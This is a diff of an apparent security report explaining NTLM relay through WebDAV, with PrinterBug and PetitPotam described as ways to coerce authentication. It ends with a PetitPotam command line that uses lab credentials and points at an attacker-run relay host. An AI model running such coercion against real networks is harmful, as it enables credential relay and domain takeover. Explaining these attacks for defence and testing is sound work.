GasPROt/reportcybersec/report.md

 ```
 start-service webclient
 ```
-Please note that if the webclient is installed but not running, there are some techniques that allow to enable the service, for example [placing a "Documents.searchConnector-ms” on a share](https://tradecraft.cafe/Windows-Search-And-WebDAV-Payloads/).
+Please note that if the webclient is installed but not running, there are some techniques that allow to enable the service, for example [placing a "Documents.searchConnector-ms” on a share](https://tradecraft.cafe/Windows-Search-And-WebDAV-Payloads/) (out of scope here).

 For our next step, how can we force an authentication over HTTP?
+Please remember that one of the ways to have a successful relay to LDAP service is to "come from" HTTP, of which WebDAV is an extension.

-An attacker can try to coerce client authentication with RPC calls, by using some techniques that started to be relevant in 2018.
-The first issue to become widely used was called “PrinterBug”: it was an authenticated method (i.e., an attacker needs to already have domain credentials) for getting a server running the Print Spooler service to initiate an NTLMv2 authentication session (using its Machine Account credentials) with a server of the attacker's choosing.
+An attacker can try to coerce client authentication by using RPC calls with some techniques that started to be relevant in 2018.
+The first issue to become widely used was called “PrinterBug”: it is an authenticated method (i.e., an attacker needs to already have domain credentials) for getting a server running the Print Spooler service to initiate an NTLMv2 authentication session (using its Machine Account credentials) with a server of the attacker's choosing.

 In 2021, the PetitPotam tool was released, utilizing a similar vulnerability in the service MS-EFSRPC (Encrypting File System Remote Protocol).
 Please note that the researchers also found two vulnerabilites (CVE-2021-36943 AND CVE-2022-26925) that allowed unauthenticated coercion.
 This meant that an attacker without any credentials could force a vulnerable server to connect to the relay server.
-To make matters worse, Domain Controllers were vulnerable to the unauthenticated attack by default.
+To make things worse, Domain Controllers were vulnerable to the unauthenticated attack by default.
 As you can imagine, the un-authenticated version of the attack has been quickly patched, but still this kind of attack is quite relevant in the authenticated flavour.

-This is an example usage, let me describe the input parameters:
+What follows is an example usage; let me describe the input parameters:
 - the username ("victim"),
 - the domain
 - the known password,
-- the server to which initiate an NTLMv2 authentication session ("attacker@80/aaa")
+- the attacker-run http server to which initiate an NTLMv2 authentication session ("attacker@80/aaa") that will be relayed
-- the IP address of the victim to attack
+- the IP address of the victim to force to connect to the previous resource
 ```
 python3 PetitPotam.py -u victim -d ntlmlab.local -p Qwerty123 attacker@80/aaa 10.0.0.2
 ```